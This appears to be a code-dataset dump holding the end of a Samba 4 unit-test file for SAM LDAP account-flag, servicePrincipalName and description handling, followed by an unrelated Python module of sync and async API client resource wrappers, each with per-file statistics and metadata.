# or server trust account and back (also swapping between trust
# accounts is allowed).
# The UF_PASSWD_NOTREQD flag is needed since we haven't requested a
# password yet.
# With SYSTEM rights you can switch to a interdomain trust account.
# Invalid attribute
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement("0",
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# This has to wait until s4 supports it (needs a password module change)
# try:
# m = Message()
# m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
# m["userAccountControl"] = MessageElement(
# str(UF_NORMAL_ACCOUNT),
# FLAG_MOD_REPLACE, "userAccountControl")
# ldb.modify(m)
# except LdbError, (num, _):
# self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE,
attrs=["sAMAccountType", "userAccountControl"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
self.assertTrue(int(res1[0]["userAccountControl"][0]) & UF_ACCOUNTDISABLE == 0)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_TEMP_DUPLICATE_ACCOUNT),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_OTHER)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_SERVER_TRUST_ACCOUNT),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_WORKSTATION_TRUST)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_WORKSTATION_TRUST_ACCOUNT),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_WORKSTATION_TRUST)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_SERVER_TRUST_ACCOUNT),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_WORKSTATION_TRUST)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_WORKSTATION_TRUST_ACCOUNT),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_WORKSTATION_TRUST)
# This isn't supported yet in s4 - needs ACL module adaption
# try:
# m = Message()
# m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
# m["userAccountControl"] = MessageElement(
# str(UF_INTERDOMAIN_TRUST_ACCOUNT),
# FLAG_MOD_REPLACE, "userAccountControl")
# ldb.modify(m)
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
def test_service_principal_name_updates(self):
"""Test the servicePrincipalNames update behaviour"""
print "Testing servicePrincipalNames update behaviour\n"
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"dNSHostName": "testname.testdom"})
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertFalse("servicePrincipalName" in res[0])
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"servicePrincipalName": "HOST/testname.testdom"})
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["dNSHostName"])
self.assertTrue(len(res) == 1)
self.assertFalse("dNSHostName" in res[0])
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"dNSHostName": "testname2.testdom",
"servicePrincipalName": "HOST/testname.testdom"})
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["dNSHostName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["dNSHostName"][0], "testname2.testdom")
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname.testdom")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement("testname.testdoM",
FLAG_MOD_REPLACE, "dNSHostName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname.testdom")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement("testname2.testdom2",
FLAG_MOD_REPLACE, "dNSHostName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname2.testdom2")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement([],
FLAG_MOD_DELETE, "dNSHostName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname2.testdom2")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement("testname.testdom3",
FLAG_MOD_REPLACE, "dNSHostName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname2.testdom2")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement("testname2.testdom2",
FLAG_MOD_REPLACE, "dNSHostName")
ldb.modify(m)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement("testname3.testdom3",
FLAG_MOD_REPLACE, "dNSHostName")
m["servicePrincipalName"] = MessageElement("HOST/testname2.testdom2",
FLAG_MOD_REPLACE,
"servicePrincipalName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname3.testdom3")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["servicePrincipalName"] = MessageElement("HOST/testname2.testdom2",
FLAG_MOD_REPLACE,
"servicePrincipalName")
m["dNSHostName"] = MessageElement("testname4.testdom4",
FLAG_MOD_REPLACE, "dNSHostName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname2.testdom2")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["servicePrincipalName"] = MessageElement([],
FLAG_MOD_DELETE,
"servicePrincipalName")
ldb.modify(m)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement("testname2.testdom2",
FLAG_MOD_REPLACE, "dNSHostName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertFalse("servicePrincipalName" in res[0])
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"sAMAccountName": "testname$"})
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertFalse("servicePrincipalName" in res[0])
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"servicePrincipalName": "HOST/testname"})
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountName"])
self.assertTrue(len(res) == 1)
self.assertTrue("sAMAccountName" in res[0])
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"sAMAccountName": "testname$",
"servicePrincipalName": "HOST/testname"})
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["sAMAccountName"][0], "testname$")
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["sAMAccountName"] = MessageElement("testnamE$",
FLAG_MOD_REPLACE, "sAMAccountName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["sAMAccountName"] = MessageElement("testname",
FLAG_MOD_REPLACE, "sAMAccountName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["sAMAccountName"] = MessageElement("test$name$",
FLAG_MOD_REPLACE, "sAMAccountName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/test$name")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["sAMAccountName"] = MessageElement("testname2",
FLAG_MOD_REPLACE, "sAMAccountName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname2")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["sAMAccountName"] = MessageElement("testname3",
FLAG_MOD_REPLACE, "sAMAccountName")
m["servicePrincipalName"] = MessageElement("HOST/testname2",
FLAG_MOD_REPLACE,
"servicePrincipalName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname3")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["servicePrincipalName"] = MessageElement("HOST/testname2",
FLAG_MOD_REPLACE,
"servicePrincipalName")
m["sAMAccountName"] = MessageElement("testname4",
FLAG_MOD_REPLACE, "sAMAccountName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname2")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["servicePrincipalName"] = MessageElement([],
FLAG_MOD_DELETE,
"servicePrincipalName")
ldb.modify(m)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["sAMAccountName"] = MessageElement("testname2",
FLAG_MOD_REPLACE, "sAMAccountName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertFalse("servicePrincipalName" in res[0])
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"dNSHostName": "testname.testdom",
"sAMAccountName": "testname$",
"servicePrincipalName": [ "HOST/testname.testdom", "HOST/testname" ]
})
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement("testname2.testdom",
FLAG_MOD_REPLACE, "dNSHostName")
m["sAMAccountName"] = MessageElement("testname2$",
FLAG_MOD_REPLACE, "sAMAccountName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["dNSHostName", "sAMAccountName", "servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["dNSHostName"][0], "testname2.testdom")
self.assertEquals(res[0]["sAMAccountName"][0], "testname2$")
self.assertTrue(res[0]["servicePrincipalName"][0] == "HOST/testname2" or
res[0]["servicePrincipalName"][1] == "HOST/testname2")
self.assertTrue(res[0]["servicePrincipalName"][0] == "HOST/testname2.testdom" or
res[0]["servicePrincipalName"][1] == "HOST/testname2.testdom")
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"dNSHostName": "testname.testdom",
"sAMAccountName": "testname$",
"servicePrincipalName": [ "HOST/testname.testdom", "HOST/testname" ]
})
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["sAMAccountName"] = MessageElement("testname2$",
FLAG_MOD_REPLACE, "sAMAccountName")
m["dNSHostName"] = MessageElement("testname2.testdom",
FLAG_MOD_REPLACE, "dNSHostName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["dNSHostName", "sAMAccountName", "servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["dNSHostName"][0], "testname2.testdom")
self.assertEquals(res[0]["sAMAccountName"][0], "testname2$")
self.assertTrue(res[0]["servicePrincipalName"][0] == "HOST/testname2" or
res[0]["servicePrincipalName"][1] == "HOST/testname2")
self.assertTrue(res[0]["servicePrincipalName"][0] == "HOST/testname2.testdom" or
res[0]["servicePrincipalName"][1] == "HOST/testname2.testdom")
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
def test_sam_description_attribute(self):
"""Test SAM description attribute"""
print "Test SAM description attribute"""
self.ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"description": "desc2",
"objectclass": "group",
"description": "desc1"})
res = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["description"])
self.assertTrue(len(res) == 1)
self.assertTrue("description" in res[0])
self.assertTrue(len(res[0]["description"]) == 1)
self.assertEquals(res[0]["description"][0], "desc1")
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
self.ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"description": ["desc1", "desc2"]})
res = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["description"])
self.assertTrue(len(res) == 1)
self.assertTrue("description" in res[0])
self.assertTrue(len(res[0]["description"]) == 2)
self.assertTrue(res[0]["description"][0] == "desc1" or
res[0]["description"][1] == "desc1")
self.assertTrue(res[0]["description"][0] == "desc2" or
res[0]["description"][1] == "desc2")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement(["desc1","desc2"], FLAG_MOD_REPLACE,
"description")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement(["desc1","desc2"], FLAG_MOD_DELETE,
"description")
ldb.modify(m)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
self.ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group" })
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement("desc1", FLAG_MOD_REPLACE,
"description")
ldb.modify(m)
res = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["description"])
self.assertTrue(len(res) == 1)
self.assertTrue("description" in res[0])
self.assertTrue(len(res[0]["description"]) == 1)
self.assertEquals(res[0]["description"][0], "desc1")
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
self.ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"description": ["desc1", "desc2"]})
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement("desc1", FLAG_MOD_REPLACE,
"description")
ldb.modify(m)
res = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["description"])
self.assertTrue(len(res) == 1)
self.assertTrue("description" in res[0])
self.assertTrue(len(res[0]["description"]) == 1)
self.assertEquals(res[0]["description"][0], "desc1")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement("desc3", FLAG_MOD_ADD,
"description")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement(["desc1","desc2"], FLAG_MOD_DELETE,
"description")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_ATTRIBUTE)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement("desc1", FLAG_MOD_DELETE,
"description")
ldb.modify(m)
res = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["description"])
self.assertTrue(len(res) == 1)
self.assertFalse("description" in res[0])
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement(["desc1","desc2"], FLAG_MOD_REPLACE,
"description")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement(["desc3", "desc4"], FLAG_MOD_ADD,
"description")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement("desc1", FLAG_MOD_ADD,
"description")
ldb.modify(m)
res = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["description"])
self.assertTrue(len(res) == 1)
self.assertTrue("description" in res[0])
self.assertTrue(len(res[0]["description"]) == 1)
self.assertEquals(res[0]["description"][0], "desc1")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m.add(MessageElement("desc1", FLAG_MOD_DELETE, "description"))
m.add(MessageElement("desc2", FLAG_MOD_ADD, "description"))
ldb.modify(m)
res = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["description"])
self.assertTrue(len(res) == 1)
self.assertTrue("description" in res[0])
self.assertTrue(len(res[0]["description"]) == 1)
self.assertEquals(res[0]["description"][0], "desc2")
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
if not "://" in host:
if os.path.isfile(host):
host = "tdb://%s" % host
else:
host = "ldap://%s" % host
ldb = SamDB(host, credentials=creds, session_info=system_session(lp), lp=lp)
runner = SubunitTestRunner()
rc = 0
if not runner.run(unittest.makeSuite(SamTests)).wasSuccessful():
rc = 1
sys.exit(rc)
| 41.215686
| 150
| 0.580025
| 10,792
| 98,794
| 5.151964
| 0.037064
| 0.052806
| 0.066007
| 0.071493
| 0.905396
| 0.892878
| 0.885773
| 0.879802
| 0.874227
| 0.865665
| 0
| 0.01072
| 0.289005
| 98,794
| 2,396
| 151
| 41.232888
| 0.780829
| 0.104348
| 0
| 0.883801
| 0
| 0
| 0.225082
| 0.112176
| 0
| 0
| 0
| 0
| 0.164282
| 0
| null | null | 0.010303
| 0.012593
| null | null | 0.005724
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3986b02adff5af069cb9cb2724853d5b7bdf642d
| 3,740
|
py
|
Python
|
lithic/_resource.py
|
lithic-com/lithic-python
|
be19d7195ebdf217b45f1ab59b39021d51330989
|
[
"Apache-2.0"
] | null | null | null |
lithic/_resource.py
|
lithic-com/lithic-python
|
be19d7195ebdf217b45f1ab59b39021d51330989
|
[
"Apache-2.0"
] | null | null | null |
lithic/_resource.py
|
lithic-com/lithic-python
|
be19d7195ebdf217b45f1ab59b39021d51330989
|
[
"Apache-2.0"
] | null | null | null |
from typing import Type, Generic, List, TypeVar
from ._core import FinalRequestOptions, RequestOptions, Rsp, Req
from ._client import SyncAPIClient, AsyncAPIClient, SyncPage, Item, TPage, TAsyncPage
class SyncAPIResource:
_client: SyncAPIClient
def __init__(self, client: SyncAPIClient):
self._client = client
def get(self, path: str, *, query: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="get", url=path, params=query, **options) # type: ignore[misc]
return self._client.request(model, opts)
def post(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="post", url=path, json=body, **options) # type: ignore[misc]
return self._client.request(model, opts)
def patch(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="patch", url=path, json=body, **options) # type: ignore[misc]
return self._client.request(model, opts)
def put(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="put", url=path, json=body, **options) # type: ignore[misc]
return self._client.request(model, opts)
def delete(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="delete", url=path, json=body, **options) # type: ignore[misc]
return self._client.request(model, opts)
def get_api_list(
self, path: str, *, query: Req = None, model: Type[Item], page: Type[TPage], options: RequestOptions
) -> TPage:
opts = FinalRequestOptions(method="get", url=path, params=query, **options) # type: ignore[misc]
return self._client.request_api_list(model, page, opts)
class AsyncAPIResource:
_client: AsyncAPIClient
def __init__(self, client: AsyncAPIClient):
self._client = client
async def get(self, path: str, *, query: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="get", url=path, params=query, **options) # type: ignore[misc]
return await self._client.request(model, opts)
async def post(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="post", url=path, json=body, **options) # type: ignore[misc]
return await self._client.request(model, opts)
async def patch(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="patch", url=path, json=body, **options) # type: ignore[misc]
return await self._client.request(model, opts)
async def put(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="put", url=path, json=body, **options) # type: ignore[misc]
return await self._client.request(model, opts)
async def delete(self, path: str, *, body: Req = None, model: Type[Rsp], options: RequestOptions) -> Rsp:
opts = FinalRequestOptions(method="delete", url=path, json=body, **options) # type: ignore[misc]
return await self._client.request(model, opts)
def get_api_list(
self, path: str, *, query: Req = None, model: Type[Item], page: Type[TAsyncPage], options: RequestOptions
) -> TAsyncPage:
opts = FinalRequestOptions(method="get", url=path, params=query, **options) # type: ignore[misc]
return self._client.request_api_list(model, page, opts)
| 53.428571
| 113
| 0.669519
| 457
| 3,740
| 5.404814
| 0.109409
| 0.064777
| 0.053441
| 0.077733
| 0.833603
| 0.833603
| 0.833603
| 0.833603
| 0.833603
| 0.833603
| 0
| 0
| 0.191176
| 3,740
| 69
| 114
| 54.202899
| 0.816529
| 0.060695
| 0
| 0.54902
| 0
| 0
| 0.013714
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.176471
| false
| 0
| 0.058824
| 0
| 0.54902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
3988fb7b284a0cc8888d53c4363a81d13ea618c9
| 81
|
py
|
Python
|
train/sample-cnn/sample_cnn/ops/__init__.py
|
devinplatt/ms_thesis
|
5ed05023c9929d9f068a01b2b022785678215e18
|
[
"MIT"
] | 49
|
2017-05-12T15:33:59.000Z
|
2022-01-03T19:15:51.000Z
|
